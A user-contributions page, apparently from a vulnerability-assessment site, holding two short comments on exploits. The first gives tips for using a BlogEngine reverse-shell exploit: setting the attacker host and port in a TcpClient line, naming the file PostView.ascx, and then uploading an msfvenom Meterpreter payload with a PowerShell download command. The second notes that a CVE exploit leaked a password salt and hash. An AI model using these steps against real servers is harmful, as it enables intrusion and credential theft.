Leafry (7)
Last Login: February 11, 2021
Leafry's Latest (2) Contributions
Technical Analysis
This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.
Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(”\(LHOST", \)LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others, this exploit creates a very unstable shell.
-The script should be named PostView.ascx
Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. –> powershell Invoke-WebRequest -Uri -Outfile reverse.exe
Technical Analysis
This exploit is ok. When running on my attack box I had to modify the code. Not the worse case. Just a few commands threw syntax errors. In the end the CVE was able to provide a salt and hash that gave me credentials to get into the box.